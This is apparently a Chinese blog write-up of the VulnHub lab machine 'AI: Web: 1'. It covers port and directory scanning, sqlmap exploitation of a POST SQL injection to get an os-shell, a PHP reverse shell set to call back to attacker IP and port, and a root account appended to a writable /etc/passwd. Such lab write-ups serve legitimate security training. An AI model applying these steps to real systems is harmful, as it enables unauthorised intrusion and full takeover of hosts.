vulnhub-AI: Web: 1 提权攻略

发表于 2019-08-27  483 次阅读


靶机地址:https://www.vulnhub.com/entry/ai-web-1,353/

0x01、导入虚拟机,开机。具体过程不赘述,可参考上一篇dpwwn的第一步。

0x02、扫描NAT的C段,确定虚拟机IP和开放端口。

IP为:192.168.157.151开放端口为:80

0x03、进行80端口深入扫描

默认网页没什么线索
御剑扫一波,找到robots.txt
找到了两个目录,以此为线索进一步扫描
在用nikto扫描m3diNf0时找到了info.php 之前使用御剑等目录扫描工具居然没有找到,扫描的字典里确实也有info.php却没扫到???
在info.php内得到了网站的根目录和php的版本中间件版本。
探索se3reTdir777时发现了文本框,习惯性测试post注入。
输入'发现存在注入点。

0x04、进一步对注入点进行探索

使用brupsuit抓到post包并发送到sqlmap插件中,如果你的bp没有此插件,可以直接使用sqlmap.py脚本进行post注入。
存在盲注和基于报错的sql注入点
爆库
爆表
爆字段
拖库
字段内容为base64加密
解密得到明文(事后发现这个密码毫无卵用)
使用sqlmap的os-shell功能获得shell
输入网站的绝对路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/ 得到os-shell

0x05、提权

上传一句话木马
菜刀连接没有成功
上传反弹shell的php木马执行,攻击者的得到shell
上传前要把此php内的目标IP和目标端口修改为攻击者所使用的IP和端口
$ip = '192.168.157.1';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
期间查找了suid文件,没有线索。但查看/etc/passwd权限,发现了拥有者为www-data,拥有可写入权限。
$perl -le 'print crypt("12345","aa")' 生成一个hash值
echo "dongluliang:aajt.4s3e3SZA:0:0:i_am_root:/root:/bin/bash" >>/etc/passwd 写入dongluliang至/etc/passwd
切换至dongluliang密码为12345 得到flag

水平有限,做了两天,踩坑无数。发现这扫描工具真的是信不过,一定要多使用几种。


专注于学习,生活,教育。